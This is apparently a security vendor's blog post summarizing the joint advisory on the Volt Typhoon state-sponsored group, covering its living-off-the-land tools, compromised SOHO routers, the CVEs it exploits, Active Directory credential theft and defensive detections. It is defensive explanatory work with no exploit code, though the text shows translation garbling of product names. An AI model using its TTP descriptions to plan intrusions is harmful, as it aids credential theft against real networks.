Several international cybersecurity authorities from the US, UK, Australia, Canada and New Zealand are issuing a joint advisory detailing tactics, techniques and procedures used in recent attacks by a Chinese state-sponsored threat actor.
Background
On May 24, several international agencies - including the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA) of the United States, the Australian Cyber Security Center (ACSC), the Communications Security Establishment's Canadian Center for Cyber Security (CCCS), New Zealand National Cyber Security Center (NCSC-NZ) and UK National Cyber Security Center (NCSC-UK) - issued ajoint cyber security advisory (CSA), AA23-144a, on Volt Typhoon, a state-sponsored threat actor from the People's Republic of China (PRC). In addition to the joint CSA, Microsoft's Threat Intelligence Teampublished a separate blog postwhich also highlights activity associated with Volt Typhoon.
Analyse
The following are some of the key points described in the joint cybersecurity advisory:
Where does the name "Volt Typhoon" come from?
It is part of a newnaming conventionused by Microsoft.
How long has the Volt Typhoon been in operation?
Reports suggest the group has been active since "at least 2021."
What are some of the geographic regions and industries that Volt Typhoon is targeting?
In both the joint CSA and Microsoft's blog post, Volt Typhoon has been observed targeting critical infrastructure organizations in the United States as well as the US island territory of Guam.
What is notable about Volt Typhoon's activity?
The threat actor has a strong focus on "stealth" activity, using what is known as living-off-the-land (LOTL) techniques and hands-on-keyboard activity.
LOTL techniques include the use of legitimate network tools preloaded on operating systems to mask their activities, such ascertutil,ntdsutil,xcopyand more. Hands-on keyboard, as the name suggests, involves a human attacker manually executing commands on a compromised system with "hands-on-keyboard" instead of using automated or programmed tools. These techniques are used by threat actors to avoid detection by common security solutions such as endpoint detection and response (EDR).
Volt Typhoon is known to focus primarily on espionage and information gathering, and the group's recent activity has centered around critical infrastructure, prompting the joint CSA to alert defenders to the threat actor's activity as well as their tactics, techniques and procedures.
Does Volt Typhoon use other techniques to hide their activity?
Yes, CSA notes the group's use of Small-Office-Home-Office (SOHO) devices as a source of obfuscation, such as a variety of devices from different vendors, including:
- ASUS
- Cisco RV
- Draytek Vigor
- FatPipe IPVPN/MPVPN/WARP
- Fortinet Fortigate
- Netgear Prosafe
- Zyxel USG
The group uses these compromised SOHO devices to proxy network traffic in an attempt to appear as legitimate network activity. Although no information was provided on how these devices were compromised, we strongly recommend ensuring that all SOHO devices are kept up to date with the latest security patches.
In addition, if these devices have been configured to publicly expose their management interfaces, you should follow the vendors' recommendations on how to secure these configurations or disable remote access to these devices where possible.
How does Volt Typhoon gain initial access to targeted organizations?
Leveraging Internet-facing assets such as Fortinet Fortiguard appliances, ManageEngine ADSelfService Plus, and FatPipe's WARP, IPVPN, and MPVPN products.
Does Volt Typhoon exploit any known vulnerabilities?
Yes, the joint CSA highlights two vulnerabilities in ManageEngine and FatPipe products that have been linked to Volt Typhoon. The agencies note that the vulnerabilities exploited by the threat actor include, but are not “limited to” the following:
| CVE | Description | CVSSv3 | VPR* |
|---|---|---|---|
| CVE-2021-40539 | ManageEngine ADSelfService Plus Authentication Bypass Vulnerability | 9.8 | 9.2 |
| CVE-2021-27860 | FatPipe WARP, IPVPN, MPVPN Unlimited dangerous type file upload | 8.8 | 7.4 |
*Please note: Tenable's Vulnerability Priority Rating (VPR) scores are calculated each night. This blog post was published on May 25 and reflects the VPR at that time.
Are there other vulnerabilities used by Volt Typhoon?
While Microsoft's blog post notes that Volt Typhoon targets Fortinet Fortiguard devices, no specific CVEs were mentioned. However, we know that Fortinet devices are apopular targetfor APT groups, includingAPT5, and there have been some activity links recentlyChinese threat actorsfor several Fortinet errors, such asCVE-2022-42475andCVE-2022-41328. However, we cannot definitively link these vulnerabilities to Volt Typhoon activity.
Historically, state-sponsored threat actors in China have exploited known vulnerabilities for years at a time, as shown in similar, older communications identified asU/OO/179811-20from 2020 onwardsAA22-279Afrom 2022. For example, CVE-2021-40539, mentioned earlier, is shown in AA22-279A. In addition, a flash warning issued by the FBI in November 2021,AC-000155-MW, discussed a zero-day vulnerability in FatPipe that was eventually assigned CVE-2021-27860. In the flash alert, the FBI describes its use of an APT actor dating back to "at least May 2021" along with the implantation of webshells on vulnerable devices.
As we outlined in our2022 Threat Landscape Report, known and exploitable vulnerabilities continue to be favored by a number of threat actors. Identifying and remediating vulnerabilities with readily available proof-of-concept (PoC) code should remain a top priority for any organization to reduce your exposure.
Does Volt Typhoon use malware?
According to Microsoft's blog post, the group rarely uses malware, but appears to prefer to rely on LOTL methods through the use of legitimate tools in an attempt to steal credentials as part of post-compromise activity.
Is Volt Typhoon targeting Active Directory?
Yes, the threat actor attempts to extract credentials from Active Directory (AD), as well as make a copy of the ntds.dit database. With a copy of ntds.dit, the threat actor can exfiltrate the database and use password cracking tools to compromise additional user accounts while remaining stealthy.
Proof of concept
Of the two vulnerabilities listed in the CSA, publicly available PoC exploit code only exists forCVE-2021-40539.
Identification of affected systems
A list of Tenable plugins to identify the two vulnerabilities highlighted in the CSA can be foundher. This link uses a search filter to ensure that all matching plugin coverage is displayed when it is released. We also recommend scanning for and remedying thesetop 20 CVEsknown to be exploited by threat actors associated with China.
The following is a list of MITER ATT&CK techniques associated with Volt Typhoon that are mapped to Tenable Identity Exposure Indicators of Attack (IOA) as well as the associated attack path analysis techniques:
| Technic ID | Description | Indicators of attack | Attack path technique |
|---|---|---|---|
| T1003.001 | OS Credential Dumping: LSASS memory | I-ProcessInjectionLsass | T1003.001_Windows |
| T1003.003 | OS Credential Dumping | I-NtdsExtraction | T1003.003_Windows |
| T1047 | Windows Management Instrumentation | N/A | T1047_Windows |
| T1059.001 | Command and script interpreter: PowerShell (Windows) | N/A | T1059.001_Windows |
| T1069.001 | Discovery of permission groups: Local groups | I-ReconAdminsEnum | T1069.001_Windows |
| T1069.002 | Discovery of permission groups: Domain groups | N/A | T1069.002_Windows |
| T1110.003 | Brute Force: Password Spraying (Windows) | I-PasswordSpraying | T1110.003_Windows |
As both Microsoft and the joint CSA point out, Volt Typhoon has been known to target and exploit Internet-facing assets for the initial compromise of networks. The external attack surface represents one of the biggest risk factors for organizations today. To minimize the risk of a breach, it is important that organizations fully understand their external attack surface and the opportunities for exploitation presented there.Durable attack surface control(formerly Tenable.asm) provides comprehensive visibility into all your Internet-connected assets, helping you better assess and manage external risks.
Additionally, the Joint CSA strongly recommends following best practices for identifying and addressing AD vulnerabilities and misconfigurations. To assist in these efforts,Durable identity exposure(formerly Tenable.ad) can be used to reduce your exposure and find and fix bugs before they become business-impacting issues.
Get more information
- Joint Cybersecurity Advisory AA23-144a
- Microsoft Threat Intelligence blog post about Volt Typhoon
- Blog for Tenables 2022 Threat Landscape Report
- Top 20 CVEs Exploited by People's Republic of China State-Sponsored Actors (AA22-279A)
ConnectTenable's Security Response Teamabout the sustainable community.
Learn more aboutDurable one, Exposure Management The platform for the modern attack surface.
Durable Security Response Team
The Tenable Security Response Team (SRT) tracks threat and vulnerability intelligence feeds to ensure our research teams can deliver sensor coverage to our products as quickly as possible. The SRT also works to analyze and assess technical details and writes white papers, blogs and additional communications to ensure stakeholders are fully informed of the latest risks and threats. SRT provides breakdowns for the latest vulnerabilities on the Tenable blog.